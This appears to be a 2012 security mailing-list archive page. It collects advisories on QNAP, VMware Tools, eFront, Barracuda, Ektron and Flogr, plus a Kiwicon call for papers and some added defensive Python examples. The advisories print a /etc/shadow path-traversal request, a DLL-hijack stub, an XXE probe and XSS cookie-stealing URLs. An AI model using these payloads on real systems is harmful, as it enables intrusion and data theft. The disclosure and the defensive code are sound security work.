QNAP Turbo NAS Multiple Path Injection

2012-09-05 Thread Andrea Fabrizi
**
Vulnerability: Multiple Path Injection
Product: QNAP Turbo NAS
Vendor: QNAP
Version affected: = 3.7.3 build 20120801
Status: Unpatched
Website: http://web.qnap.com/pro_detail_feature.asp?p_id=202
Discovered by: Andrea Fabrizi
Email: andrea.fabr...@gmail.com
Web: http://www.andreafabrizi.it
**

This vulnerability has been discovered on a QNAP TS-1279U-RP, but other
products that use the same firmware may also be affected.

The CGI /cgi-bin/filemanager/utilRequest.cgi is prone to a path
injection, which makes it possible,
for authenticated users, to access, delete or modify any file, including
system files, configuration files and
files owned by other users.

Due to the single-user configuration of the embedded Linux system, it
is possible to access
any system file without restrictions (including /etc/shadow, which
contains the hash of the administrator password).

Vulnerable parameters are (the list is not exhaustive):
/cgi-bin/filemanager/utilRequest.cgi [source_file]
/cgi-bin/filemanager/utilRequest.cgi?func=delete [file_name]
/cgi-bin/filemanager/utilRequest.cgi?func=copy [dest_path]
/cgi-bin/filemanager/utilRequest.cgi?func=move [dest_path]
/cgi-bin/filemanager/utilRequest.cgi?func=get_acl_properties [name]

Sample HTTP request:
###
POST /cgi-bin/filemanager/utilRequest.cgi/test.txt HTTP/1.1
Host: 192.168.0.10
Content-Type: application/x-www-form-urlencoded
Content-Length: 123

isfolder=0&func=download&sid=12345abc&source_total=1&source_path=/myFiles&source_file=../../../etc/shadow
###
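The defence the advisory implies is a containment check on the user-controlled path parameters before the CGI touches the filesystem. The following is an added example, not code from the advisory or from QNAP: it parses a form-encoded body of the shape shown above, joins source_path and source_file under an assumed share root (the SHARE_ROOT value is a placeholder), and rejects anything that normalises to a location outside that root.

```python
import posixpath
from urllib.parse import parse_qs

# Assumed share root: the directory tree the file manager is meant to expose.
SHARE_ROOT = "/share"


class PathInjection(ValueError):
    """Raised when user-supplied path parameters escape the share root."""


def resolve_share_path(share_root: str, source_path: str, source_file: str) -> str:
    """Join source_path/source_file under share_root and refuse any result
    that normalises to a location outside it.

    The containment test is lexical (normpath only). A real handler should
    also realpath() the result so a symlink inside the share cannot point
    back out of it, and should not run with the all-powerful single user
    the advisory describes, so that a bypass still cannot read /etc/shadow.
    """
    root = posixpath.normpath(share_root)
    # An absolute file name would make posixpath.join discard the root entirely.
    if posixpath.isabs(source_file):
        raise PathInjection(f"absolute source_file {source_file!r} rejected")
    candidate = posixpath.normpath(
        posixpath.join(root, source_path.lstrip("/"), source_file)
    )
    prefix = root.rstrip("/") + "/"
    if candidate != root and not candidate.startswith(prefix):
        raise PathInjection(
            f"{source_path!r} + {source_file!r} resolves to {candidate}, outside {root}"
        )
    return candidate


def resolve_from_body(body: str, share_root: str = SHARE_ROOT) -> str:
    """Pull source_path and source_file out of a form-encoded request body
    (the shape of the advisory's sample request) and resolve them."""
    params = parse_qs(body, keep_blank_values=True)
    source_path = params.get("source_path", [""])[0]
    source_file = params.get("source_file", [""])[0]
    return resolve_share_path(share_root, source_path, source_file)


if __name__ == "__main__":
    # Constructed request bodies: a benign download and the traversal from the advisory.
    benign = ("isfolder=0&func=download&sid=12345abc&source_total=1"
              "&source_path=/myFiles&source_file=test.txt")
    traversal = ("isfolder=0&func=download&sid=12345abc&source_total=1"
                 "&source_path=/myFiles&source_file=../../../etc/shadow")
    print("benign   ->", resolve_from_body(benign))
    try:
        resolve_from_body(traversal)
    except PathInjection as err:
        print("rejected ->", err)
```

The same check applies unchanged to the other listed parameters (file_name, dest_path, name): every one of them is a path the user chooses, so every one must be resolved and tested against the share root.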


VMWare Tools susceptible to binary planting by hijack

2012-09-05 Thread moshez
Security Advisory - VMWare Tools susceptible to binary planting by hijack
=
Summary   : VMWare Tools susceptible to binary planting
Date  : 4 September 2012
Affected versions : Product versions prior to -
Workstation 8.0.4
Player 4.0.4
Fusion 4.1.2
View 5.1
ESX 5.0 P03
ESX 4.1 U3
Not affected: ESX 4.0, ESX 3.5
CVE reference : CVE-2012-1666

Details

VMWare Tools handles many functions involved with host-guest interactivity,
providing a richer environment for the end-user and server administrators alike.
Part of VMWare Tools responsibilities is handling printer services through host
and is called by a third-party acquired tool (ThinPrint).

During initiation, which occurs during many steps throughout printer comm.
negotiation, a non-existent dynamic-link library is called, resulting in an
unqualified dynamic-link library call to 'tpfc.dll'.

A user with local disk access can carefully construct a DLL that suits the
pattern that is being traversed by the client and implement it somewhere along
the search path, and the client will load it seamlessly.

Impact

After the DLL has been implemented, an unsuspecting user who runs printer
services, for example, will cause it to load, resulting in arbitrary code
execution at the user's privilege level.

This vector of attack is mainly used in local privilege escalation scenarios
and user credential harvesting, and can be used by malware to disguise itself,
amongst other uses.

Proof of Concept


#include <windows.h>

/* Visible marker used by the advisory: launches calc.exe when the planted DLL loads. */
int hijack_poc()
{
    WinExec("calc.exe", SW_NORMAL);
    return 0;
}

BOOL WINAPI DllMain(HINSTANCE hinstDLL,
                    DWORD dwReason,
                    LPVOID lpvReserved)
{
    hijack_poc();
    return 0;
}

Solution

Official patches were delivered by vendor and can be fetched from www.vmware.com

Credits

The issue was responsibly reported by Moshe Zioni from Comsec Global Consulting.

Timeline
=
4 September 2012
Security advisory released by Comsec Consulting
31 August 2012
Vendor finished on deploying fixes to products, release notes published
13 March 2012
Vendor started to implement fixes to products
14 February 2012
First response from vendor
13 February 2012
Bug reported by Moshe Zioni from Comsec Global Consulting
to VMWare and third-party printer driver developers in sync

References
=
VMWare
http://www.vmware.com
Release notes
https://www.vmware.com/support/vsphere4/doc/vsp_esxi41_u3_rel_notes.html#resolvedissuessecurity

Comsec Global Consulting
http://www.comsecglobal.com/


IPv6 implications on IPv4 nets: IPv6 RAs, IPv4, and VPN evasion

2012-09-05 Thread Fernando Gont
Folks,

draft-gont-opsec-ipv6-implications-on-ipv4-nets has been adopted as an
IETF opsec wg item (please see:
http://tools.ietf.org/html/draft-ietf-opsec-ipv6-implications-on-ipv4-nets)

I was thinking about discussing the following scenario, that I came up
with a few days ago:

A dual-stacked user (v6 enabled by default) visits an IPv4-only
network, and establishes his VPN with his office (for mitigating
sniffing attacks, etc.).

A local attacker sends forged ICMPv6 RAs, thus triggering IPv6
configuration at the victim nodes.

If any of the remote nodes the victim is trying to visit is
IPv6-enabled, then it's possible/likely that the IPv6 destination
address will be used over the IPv4 one, in which case the victim will
send his traffic on the local network, as opposed to through the VPN.

Assuming the VPN product does not disable local v6 support, and that the
VPN does not provide IPv6 connectivity (*), this attack vector could
prove to be an interesting one (unexpected, to some extent).

(*) even then, this attack might still work.

Thoughts?

P.S.: Comments on the current version of the aforementioned
Internet-Draft will be welcome, too.

And yeah, our Twitter is @SI6Networks...

Thanks!

Best regards,
-- 
Fernando Gont
SI6 Networks
e-mail: fg...@si6networks.com
PGP Fingerprint:  31C6 D484 63B2 8FB1 E3C4 AE25 0D55 1D4E 7492







eFront Educational v3.6.11 - Multiple Web Vulnerabilities

2012-09-05 Thread Vulnerability Lab
Title:
==
eFront Educational v3.6.11 - Multiple Web Vulnerabilities


Date:
=
2012-08-03


References:
===
http://www.vulnerability-lab.com/get_content.php?id=666


VL-ID:
=
666


Common Vulnerability Scoring System:

3.5


Introduction:
=
Tailored with larger organizations in mind, eFront Educational offers solutions 
for the management of companies' most 
valued asset - the people. Based on a coherent approach to human capital 
management which keeps the workforce actively 
engaged, the eFront Educational platform offers the means of aligning learning 
programs with business goals to cultivate 
employee skills and knowledge associated with business performance. eFront 
Enterprise builds on top of eFront Educational.

(Copy of the Vendor Homepage: http://efrontlearning.net/product/ )


Abstract:
=
A Vulnerability Laboratory Researcher of the Vulnerability Laboratory Team 
discovered multiple web vulnerabilities in eFront v3.6.11 Educational.


Report-Timeline:

2011-08-03: Public Disclosure


Status:

Published


Affected Products:
==
eFront
Product: Educational v3.6.11


Exploitation-Technique:
===
Remote


Severity:
=
High


Details:

Multiple persistent input validation vulnerabilities are detected in the eFront 
Educational v3.6.11 Content Management System.
The vulnerabilities allow remote attackers to implement/inject malicious script 
code on the application side (persistent).
The first vulnerability is located in the profile module with the bound 
vulnerable firstname & lastname parameters. The bug 
allows a low privileged student account to exploit higher privileged trainer or 
administrator user accounts via registration.
Exploitation of the first vulnerability requires a low privileged student 
e-learning application user account.
The second vulnerability is located in the Messages - New Folder Name module 
with the bound vulnerable folder listing.
Exploitation of the second vulnerability requires a low privileged student user 
account & is only locally exploitable.
Successful exploitation of the vulnerabilities can lead to persistent session 
hijacking (manager/admin) or stable 
(persistent) context manipulation. 


Vulnerable Module(s):
[+] Profile - User (Administrator User Listing)
[+] Messages


Vulnerable Parameters(s):
[+] Firstname & Lastname
[+] Foldername


Proof of Concept:
=
The persistent input validation vulnerabilities can be exploited by a remote 
attacker with a privileged student account.
For demonstration or reproduce ...


Review: Administrator - User Listing (Firstname & Lastname)

tr id=row_student class=oddRowColor 
tda 
href=http://efront.127.0.0.1:137/educational/www/administrator.php?ctg=personaluser=student;
 
class=editLinkspan id=column_studentiframe 
src=administrator.php-[PERSISTENT INJECTED SCRIPT CODE!])' = 
d.= (student)= span=/a/td

Affected URL(s):
http://efront.127.0.0.1:137/educational/www/student.php?ctg=personal&user=student&op=profile
http://efront.127.0.0.1:137/educational/www/administrator.php?ctg=users
http://efront.127.0.0.1:137/educational/www/administrator.php?ctg=personal&user=student&op=profile


Review: Messages - Add New Folder Name - Listing

td
span class=counter4./span
a href=http://efront.127.0.0.1:137/educational/www/student.php?ctg=messages;
folder=10iframe src=student-[PERSISTENT INJECTED SCRIPT CODE!])'  (0= 
messages,= 0kb)= a=
/td
td


Risk:
=
The security risk of the persistent web vulnerabilities is estimated as 
high(-).


Credits:

Vulnerability Laboratory [Research Team]  -Benjamin Kunz Mejri 
(b...@vulnerability-lab.com)


Disclaimer:
===
The information provided in this advisory is provided as it is without any 
warranty. Vulnerability-Lab disclaims all warranties, 
either expressed or implied, including the warranties of merchantability and 
capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, 
indirect, incidental, consequential loss of business 
profits or special damages, even if Vulnerability-Lab or its suppliers have 
been advised of the possibility of such damages. Some 
states do not allow the exclusion or limitation of liability for consequential 
or incidental damages so the foregoing limitation 
may not apply. We do not approve or encourage anybody to break any vendor 
licenses, policies, deface websites, hack into databases 
or trade with fraud/stolen material.

Domains:www.vulnerability-lab.com   - www.vuln-lab.com  
   - www.vulnerability-lab.com/register
Contact:ad...@vulnerability-lab.com - supp...@vulnerability-lab.com 
   - resea...@vulnerability-lab.com
Section:

eFront Enterprise v3.6.11 - Multiple Web Vulnerabilities

2012-09-05 Thread Vulnerability Lab
Title:
==
eFront Enterprise v3.6.11 - Multiple Web Vulnerabilities


Date:
=
2012-08-06


References:
===
http://www.vulnerability-lab.com/get_content.php?id=668


VL-ID:
=
668


Common Vulnerability Scoring System:

3.5


Introduction:
=
Tailored with larger organizations in mind, eFront Enterprise offers solutions 
for the management of companies' most 
valued asset - the people. Based on a coherent approach to human capital 
management which keeps the workforce actively 
engaged, the eFront Educational platform offers the means of aligning learning 
programs with business goals to cultivate 
employee skills and knowledge associated with business performance. eFront 
Enterprise builds on top of eFront Enterprise.

(Copy of the Vendor Homepage: http://efrontlearning.net/product/ )


Abstract:
=
A Vulnerability Laboratory Researcher of the Vulnerability Laboratory Team 
discovered multiple web vulnerabilities in eFront's v3.6.11 Enterprise CMS.


Report-Timeline:

2011-07-27: Vendor Notification
2011-08-06: Public Disclosure


Status:

Published


Affected Products:
==
eFront
Product: eLearning Enterprise Edition v3.6.11


Exploitation-Technique:
===
Remote


Severity:
=
High


Details:

Multiple persistent input validation vulnerabilities are detected in the eFront 
Enterprise v3.6.11 Content Management System.
The vulnerabilities allow remote attackers to implement/inject malicious script 
code on the application side (persistent).

The first vulnerability is located in the Organization & Organizational Profile 
module with the bound vulnerable Father name 
parameter and listing. The bug allows a low privileged trainee account to 
exploit higher privileged professor or administrator 
user accounts via the organisation registration listing. Exploitation of the first 
vulnerability requires a low privileged trainee 
e-learning application user account.

The second vulnerability is located in the Files module with the bound 
vulnerable file name listing.
Exploitation of the second vulnerability requires a low privileged trainee 
e-learning application user account.

The third vulnerability is located in the `Write something about yourself` 
input message box module with the bound vulnerable 
listing. Exploitation of the third vulnerability requires a privileged 
trainee/professor/admin e-learning application user account.
The third issue is only locally exploitable because no affected output listing is 
available for the vulnerable 
`Write something about yourself` application module.


Successful exploitation of the vulnerabilities can lead to persistent session 
hijacking (professor/admin), persistent phishing
attacks or stable (persistent) context manipulation. 


Vulnerable Module(s):
[+] Organization  Organizational Profile
[+] Files
[+] PANEL Index - Write something about 
yourself (Only locally exploitable!)


Vulnerable Parameters(s):
[+] Father name [Organisation Listing]
[+] File Name [Listing]
[+] Message - Index [Listing]


Proof of Concept:
=
The persistent input validation vulnerabilities can be exploited by remote 
attackers with a low privileged trainee account.
For demonstration or reproduce ...


Review: Organization - Organization Profile (Fathername & Organisationname)

<tbody><tr><td class="labelCell">Father name: </td>
<td class="elementCell"><input class="inputText" name="father" value="[PERSISTENT INJECTED SCRIPT CODE!])" type="text"></td></tr>
<tr><td class="labelCell">Gender: </td>
<td class="elementCell"><select class="inputText" name="sex">
<option value="0" selected="selected">Male</option>
<option value="1">Female</option>
</select></td></tr>
<tr><td class="labelCell">Birthday: </td>
<td class="elementCell"><select name="birthday[d]">
<option value="1" selected="selected">01</option>
<option value="2">02</option>
<option value="3">03</option>
<option value="4">04</option>
<option value="5">05</option>
<option value="6">06</option>

URL: 
http://efront.127.0.0.1:1339/enterprise/www/student.php?ctg=personal&user=trainee&op=org_form


Review: Files - File Name [Listing]

tr class=defaultRowHeight evenRowColortd class=centerAlignspan 
style=display:none/span
img src=student-Dateien/folder.png alt= title= border=0/tdtdspan 
id=span_%2Fvar%2Fwww%2Fvhosts%2F
demo%2Fenterprise%2Fupload%2Ftrainee%2Fmodule_hcd%2Fpublic%2F%22%3E%3Ciframe+src%3Da+[PERSISTENT
 INJECTED SCRIPT CODE!] 
style=display:none;%2Fvar%2Fwww%2Fvhosts%2Fdemo%2Fenterprise%2Fupload%2Ftrainee%2Fmodule_hcd
%2Fpublic%2F%22%3E%3C[PERSISTENT INJECTED SCRIPT CODE!]/spana 
class=editLink href=javascript:void(0) 
onclick=eF_js_rebuildTable($('filename_filesTable').down().getAttribute('tableIndex'),
 0, '', 'desc', 

Barracuda Web Filter 910 5.0.015 - Multiple Vulnerabilities

2012-09-05 Thread Vulnerability Lab
Title:
==
Barracuda Web Filter 910 5.0.015 - Multiple Vulnerabilities


Date:
=
2012-08-02


References:
===
http://www.vulnerability-lab.com/get_content.php?id=570

Barracuda Networks Security ID: BNSEC-279/BNYF-5533


VL-ID:
=
570


Common Vulnerability Scoring System:

4.5


Introduction:
=
The Barracuda Web Filter is an integrated content filtering, application 
blocking and malware protection 
solution that is powerful, easy to use and affordable for businesses of all 
sizes. It enforces Internet 
usage policies by blocking access to Web sites and Internet applications that 
are not related to business, 
and it easily and completely eliminates spyware and other forms of malware from 
your organization. No more 
productivity loss trying to repair computers or make computers usable again.

Blocks access to Web sites based on domain, URL pattern, or content category
Blocks downloads based on file type
Blocks applications that access the Internet, including IM, music services, and 
software update utilities
Integrates with  safe search  filters built into popular images search engines
Provides integrated gateway and desktop spyware protection
Uses Barracuda Web Security Agents compatible with Windows PC’s and Macs to 
enforce Internet policies on off-network computers

The Barracuda Web Filter combines preventative, reactive, and proactive 
measures to form a complete Web 
filtering solution. Designed for the enterprise, the Barracuda Web Filter 
enables you to set up custom policies 
for particular users and groups across customizable time ranges. The Barracuda 
Web Filter integrates with popular 
LDAP directory servers, such as Microsoft Active Directory, for both 
authentication and group membership 
information on which to apply custom policies. Sample uses of group policies 
include:

Restricting access to job board Web sites to only the Human Resources group
Defining separate policies for teachers and students at a school
Enabling compliance officers unrestricted access to the Web for investigation
Providing external instant messaging (e.g., AIM) access only to specific users 
or groups
Restricting personal Web browsing to non-working hours

For organizations that do not utilize directory servers, policies can be 
defined for unauthenticated users as a whole, 
locally defined users and groups, or network IP address ranges.

(Copy of the Vendor Homepage: 
http://www.barracudanetworks.com/ns/products/web-filter-overview.php )


Abstract:
=
The Vulnerability Lab Research Team discovered multiple Web Vulnerabilities in 
Barracuda's Web Filter Application v5.0.0.015 Appliance Model 910.


Report-Timeline:

2012-05-01: Researcher Notification & Coordination
2012-05-08: Vendor Notification
2012-06-13: Vendor Response/Feedback
2012-07-25: Vendor Fix/Patch
2012-08-02: Public or Non-Public Disclosure


Status:

Published


Affected Products:
==
Barracuda Networks
Product: Barracuda Web Filter Appliance 910 v5.0.0.015


Exploitation-Technique:
===
Remote


Severity:
=
Medium


Details:

Multiple persistent input validation vulnerabilities are detected in the 
Barracuda Web Filter Application v5.0.0.015 Appliance Model 910. 
The bugs allow remote attackers to implement/inject malicious script code on 
the application side (persistent). Successful exploitation 
of the vulnerability can lead to session hijacking (manager/admin) or stable 
(persistent) context manipulation. Exploitation requires 
low user interaction. The vulnerability is located in the NTLM Edit - Host & 
Domain Name which is bound to the affected vulnerable 
Existing Authentication Services listing.  Another vulnerability is located on 
the upload key tab in combination with the 
unsanitized short domain name input field + output listing.


Vulnerable Module(s):
[+] Authentication  New Authentication 
Service
   [-] NTLM - Server Hostname  Domain Name - 
Existing Authentication Services

[+] Authentication  Kerberos  Advanced 
Settings
   [-] Upload Key Tab File in combination with 
alternative Short Domain Name

Picture(s):
../1.png
../2.png


Proof of Concept:
=
The persistent web vulnerabilities can be exploited by remote attackers with 
high[-](medium+) user interaction or via a 
local low privileged user account with low required user interaction. For 
demonstration or reproduce ...

Review: NTLM Edit & Listing

<td colspan="2" style="" valign="top" width="285"><input autocomplete="off" id="UPDATE_ntlm_server_hostname:md5UBwQ8iCjrc1egk1wTV8SEg" name="UPDATE_ntlm_server_hostname:md5UBwQ8iCjrc1egk1wTV8SEg" size="30" value="[PERSISTENT SCRIPT CODE EXECUTION!]" type="text"><br><div nowrap="">
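The three stored-XSS advisories above (eFront Educational's firstname/lastname and folder listings, eFront Enterprise's Father name and file name listings, and Barracuda's NTLM hostname field) share one root cause: a stored value is written back into HTML without encoding for the context it lands in. The following is an added example, not code from any of the three vendors or from Vulnerability Lab. It renders a user-listing row and a pre-filled form field in the vulnerable way and in the hardened way, using a constructed placeholder string in place of the "[PERSISTENT INJECTED SCRIPT CODE!]" marker; the markup shapes are modelled on the snippets quoted in the advisories and are not the products' real templates.

```python
import html
from urllib.parse import urlencode

# Constructed placeholder in the shape the advisories describe; it stands in
# for "[PERSISTENT INJECTED SCRIPT CODE!]" and is not a working payload.
INJECTED = '"><iframe src=a>[INJECTED]'


def esc(value: str) -> str:
    """HTML-encode for both element text and double-quoted attribute values."""
    return html.escape(str(value), quote=True)


def listing_row_unsafe(username: str, firstname: str, lastname: str) -> str:
    """The vulnerable pattern: stored profile fields concatenated into markup verbatim."""
    return (
        f'<tr id="row_{username}" class="oddRowColor"><td>'
        f'<a href="administrator.php?ctg=personal&user={username}" class="editLink">'
        f'<span id="column_{username}">{firstname} {lastname} ({username})</span>'
        f"</a></td></tr>"
    )


def listing_row_safe(username: str, firstname: str, lastname: str) -> str:
    """Same row with every user-controlled value encoded for the context it
    lands in: URL-encoded inside the query string, then HTML-encoded as an
    attribute value or as element text."""
    query = urlencode({"ctg": "personal", "user": username})
    return (
        f'<tr id="row_{esc(username)}" class="oddRowColor"><td>'
        f'<a href="administrator.php?{esc(query)}" class="editLink">'
        f'<span id="column_{esc(username)}">{esc(firstname)} {esc(lastname)} ({esc(username)})</span>'
        f"</a></td></tr>"
    )


def input_field_safe(name: str, value: str) -> str:
    """Form field pre-filled from stored data (the Father-name / NTLM-hostname case).
    quote=True turns both " and ' into entities, so the value cannot close the
    attribute and start a new tag."""
    return f'<input class="inputText" name="{esc(name)}" value="{esc(value)}" type="text">'


def reflects_markup(rendered: str, marker: str = "<iframe") -> bool:
    """True if raw markup from the input survived into the output."""
    return marker in rendered


if __name__ == "__main__":
    print(listing_row_unsafe("student", INJECTED, "Doe"))
    print(listing_row_safe("student", INJECTED, "Doe"))
    print(input_field_safe("father", INJECTED))
```

Input validation on the way in (length limits, character allowlists for names and hostnames) is worth having as well, but it is the output encoding at render time that removes the class of bug, because the same stored value is shown in several listings and every one of them has to be safe.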

Ektron CMS - Multiple Vulnerabilities - Security Advisory - SOS-12-009

2012-09-05 Thread Lists

Sense of Security - Security Advisory - SOS-12-009

Release Date.  05-Sep-2012
Last Update.   -  
Vendor Notification Date.  07-May-2012

Product.   Ektron CMS
Platform.  ASP.NET
Affected versions. Ektron CMS version 8.5.0 and possibly others
Severity Rating.   High
Impact.Exposure of sensitive information
  Exposure of system information
  System Access
Attack Vector. Remote without authentication
Solution Status.   Fixed in version 8.6 
  (not verified by SOS)

CVE reference. CVE - not yet assigned

Details.
The web application is vulnerable to multiple security
vulnerabilities, such as Unauthenticated File Upload and
XML eXternal Entities (XXE) injection.

1.Unauthenticated File Upload:
The form /WorkArea/Upload.aspx does not require authentication
to upload a file. By issuing a POST request with a webshell
embedded in a JPEG image and specifying the ASPX extension it is
possible to upload ASPX code to /uploadedimages/. The ASPX code
is placed in the comment section of the JPEG so that it survives
image resizing.

2.XXE Injection:
The XML parser at /WorkArea/Blogs/xmlrpc.aspx is vulnerable to
XML external entity attacks which can be used to Scan behind
perimeter firewalls or possibly include files from the local file
system e.g.
<!DOCTYPE scan [<!ENTITY test SYSTEM "http://localhost:22">]>
<scan>&test;</scan>

Solution.
Upgrade to version 8.6 and remove the /WorkArea/Blogs/xmlrpc.aspx file.

Discovered by.
Phil Taylor and Nadeem Salim from Sense of Security Labs.

About us.
Sense of Security is a leading provider of information security and
risk management solutions. Our team has expert skills in assessment 
and assurance, strategy and architecture, and deployment through to
ongoing management. We are Australia's premier application penetration
testing firm and trusted IT security advisor to many of the country's
largest organisations.


Sense of Security Pty Ltd 
Level 8, 66 King St

Sydney NSW 2000
AUSTRALIA

T: +61 (0)2 9290 
F: +61 (0)2 9290 4455
W: http://www.senseofsecurity.com.au
E: i...@senseofsecurity.com.au
Twitter: @ITsecurityAU

The latest version of this advisory can be found at:
http://www.senseofsecurity.com.au/advisories/SOS-12-009.pdf

Other Sense of Security advisories can be found at:
http://www.senseofsecurity.com.au/research/it-security-advisories.php
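The XXE issue above comes down to an XML-RPC endpoint whose parser honours a client-supplied DTD. The following is an added example, not Ektron's code or Sense of Security's: it parses untrusted XML with Python's expat bindings and aborts at the first DOCTYPE or entity declaration, so the SYSTEM entity from the advisory's sample is never resolved and no connection to localhost:22 is attempted. The benign XML-RPC document is constructed for the example.

```python
import xml.parsers.expat

# The entity test from the advisory, and a constructed benign XML-RPC call.
XXE_SAMPLE = (
    b'<!DOCTYPE scan [<!ENTITY test SYSTEM "http://localhost:22">]>'
    b"<scan>&test;</scan>"
)
BENIGN_SAMPLE = b"<methodCall><methodName>blog.getPost</methodName></methodCall>"


class DtdNotAllowed(ValueError):
    """Raised when a client-supplied document carries a DOCTYPE or entity declaration."""


def parse_untrusted_xml(data: bytes) -> dict:
    """Parse XML from an untrusted client into nested dicts, refusing DTDs.

    The DOCTYPE handler raises before expat reaches any entity declaration,
    so a SYSTEM entity is never resolved. ExternalEntityRefHandler returning
    0 is a second line of defence: expat then fails the parse instead of
    fetching the referenced URL or file.
    """
    parser = xml.parsers.expat.ParserCreate()
    root = {"tag": None, "attrs": {}, "text": "", "children": []}
    stack = [root]

    def start_doctype(name, sysid, pubid, has_internal_subset):
        raise DtdNotAllowed(f"DOCTYPE {name!r} rejected")

    def entity_decl(*_unused):
        raise DtdNotAllowed("entity declaration rejected")

    def external_entity_ref(_context, _base, _system_id, _public_id):
        return 0  # never fetch; expat reports a parse error instead

    def start_element(tag, attrs):
        node = {"tag": tag, "attrs": attrs, "text": "", "children": []}
        stack[-1]["children"].append(node)
        stack.append(node)

    def end_element(_tag):
        stack.pop()

    def character_data(text):
        stack[-1]["text"] += text

    parser.StartDoctypeDeclHandler = start_doctype
    parser.EntityDeclHandler = entity_decl
    parser.ExternalEntityRefHandler = external_entity_ref
    parser.StartElementHandler = start_element
    parser.EndElementHandler = end_element
    parser.CharacterDataHandler = character_data
    parser.Parse(data, True)
    return root["children"][0]


if __name__ == "__main__":
    print(parse_untrusted_xml(BENIGN_SAMPLE)["children"][0]["text"])
    try:
        parse_untrusted_xml(XXE_SAMPLE)
    except DtdNotAllowed as err:
        print("rejected:", err)
```

XML-RPC never needs a DTD, so rejecting DOCTYPE outright costs nothing for legitimate clients; in the .NET stack the advisory concerns, the equivalent is configuring the reader to prohibit DTD processing and to use no resolver.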



KIWICON: THE ANNUNCIATION

2012-09-05 Thread Kiwicon
Dear bugtraq,

We the Kiwicon crüe beseech you with our annual CFP

If this whole rfc822 mail thing isn't your bag, we put this in a
<pre> tag so it was web2.0;
https://www.kiwicon.org/the-con/cfp


---
KIWICON: THE ANNUNCIATION

BOOK SIX, CHAPTER ONE

1 In the eighth month the messengers came unto the Crue, and said, Hail, thou
art highly favoured, blessed art thou among con organisers.

2 But when the Crue beheld the messengers, they were greatly troubled and
perplexed about what manner of salutation this should be.

3 And the messengers said Fear not, Crue, for thou shalt conceive and bring
forth a 'con, by name Kiwicon. It shall be great, and will reign over the
Wellington Opera House on the seventeenth and eighteenth days of November of
this year.

4 And the Crue said How shall this be, seeing as we know not speakers?

5 (an impudent harlot snickered biblically, amirite, but this utterance
lowereth the solemnity of the visitation, and she was shushed sternly from the
Most High)

6 And the messengers said unto them, Thou shalt make haste, and put out a CFP,
and the speakers will come unto thee, yea, unto the very ends of the earth they
will come.

7 And the Crue arose, cursing, and pulled out thine fingers.

8 If anyone is able to hear, let them listen, for here is wisdom. Those that
hath understanding, let them count the number of the beast; for it is the
number of the 'con: and its number is Six.

   ..
 .'|   .   ..  .   .   .|'.
|  | .'| .'||'.  .'| .'| .'| ___  ___  __   |  |
|  ||  ||  ||  ||  ||  ||  ||   _   ||_  ||  |  |  |
|  |  ||  ||  ||  ||  ||  | |__||  _\ | ||   '.|  |
|  ||  ||  ||  ||  ||  | | |___| ||  |'.   |
|  ||__||__||  ..  ||__||___\|___/|__|  |  |
| / |.'  '.| \ |
|/   SIX SIX SIX  \|
| NEW ZEALAND'S HACKER CON - WELLINGTON 17-18 NOV 2012 |

9 And the Crue opened the first seal and a voice cried out like the tolling of
great bronze bells. But yet the voice spake in modern English, because we can't
keep this up, saying, You must give a speaker slot to those who will speak of
great and wondrous things. Without these people your con will be shit, and
everyone will mutter about how much better it was last year, and lo, even the
year before that, and the year before that.  And you will know shame and hide
your faces, because they will be right.

10 The Crue obeyed, and asked the internet to ante up with the good
submissions; with wisdom and learning as of the elders of this nation, saving
those who speak like the braying of asses and cries of beasts in the
wilderness:

Thy Name:
Thy Country of Residence:
The Title:
The Length of Thy Parable (not a euphemism):
The Shortened Sunday School Version, Possibly With Hand Puppets:
Thy Ancestry:

11 Kiwicon 1 begat Kiwicon 2, which begat Kiwicon 3, which begat Kiwicon 4, and
it came to pass that Kiwicon 5 was begat from this lineage also, as the Crue
willed it, as they are somewhat slow learners.

12 This genealogy proveth that, like its antecedents, Kiwicon 6 will issue
forth in a single stream not unlike that of horses. For according to that which
thou asked for, the talk slots will be given.

13 Gantt charts were given by our Lord to project managers, and whilst smiting
these demons with lightning, the Crue accidentally scheduled short-form talks
of 5 minutes, which came to be known as Lightning Talks.

14 There is no foolishness in a hacker who spake only five minutes if that
hacker hath 5 minutes of content. The fool speaks for one hours length on
cyberwar, but drinketh for that day, and for the day following, and the
drooling on the person sitting next to them, of which photos were taken.

15 Verily transmitteth your response unto c...@kiwicon.org no later than eighth
day October, in this year of 2012.

16 On the twenty fourth day of September, the Crue will proclaim the names of
the beasts with the feet of a bear, who haveth submitted early and are
rewardeth thus with the fruit of a leopard.

17 (And lo, a digression rose from the sea with ten crowns of blasphemy, and to
that beast was given a mouth, to decry that the KJV does get a bit wack all up
in revelation, yo)

18 The Crue opened the second seal, and the internet spake, Aren't you guys
tired of this thing yet? 'Verily transmitteth', WTF?

19 And the Crue replied, Yea, for lo, this thee and thoust thing is confusing,
and we keep having to rewrite it, and now whilst has ceased to look like a real
word at all. And those with reading comprehension problems sang out in glorious
alleluias.

20 Kiwicon is not the worst computer security conference in .nz.  

Cross-Site Scripting (XSS) Vulnerabilities in Flogr

2012-09-05 Thread advisory
Advisory ID: HTB23110
Product: Flogr
Vendor: Flogr
Vulnerable Version(s): 2.5.6 and probably prior
Tested Version: 2.5.6
Vendor Notification: August 15, 2012 
Public Disclosure: September 5, 2012 
Vulnerability Type: Cross-Site Scripting [CWE-79]
CVE Reference: CVE-2012-4336
CVSSv2 Base Score: 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N)
Risk Level: Medium 
Discovered and Provided: High-Tech Bridge Security Research Lab ( 
https://www.htbridge.com/advisory/ ) 

---

Advisory Details:

High-Tech Bridge Security Research Lab discovered multiple vulnerabilities in 
Flogr, which can be exploited to perform Cross-Site Scripting (XSS) attacks.


1) Cross-Site Scripting (XSS) Vulnerabilities  in Flogr: CVE-2012-4336

1.1 Input appended to the URL after /index.php is not properly sanitised before 
being returned to the user. 
This can be exploited to execute arbitrary HTML and script code in a user's 
browser session in context of an affected website.

The following PoC demonstrates the vulnerability:

http://[host]/index.php/%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E/

Successful exploitation of this vulnerability requires that Apache's directive 
AcceptPathInfo is set to on or default (default value is default) 

1.2 Input passed via arbitrary GET parameter to /index.php is not properly 
sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in user's 
browser session in context of an affected website.

The following PoC demonstrates the vulnerability:

http://[host]/index.php?[any]=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E



---

References:

[1] High-Tech Bridge Advisory HTB23110 - 
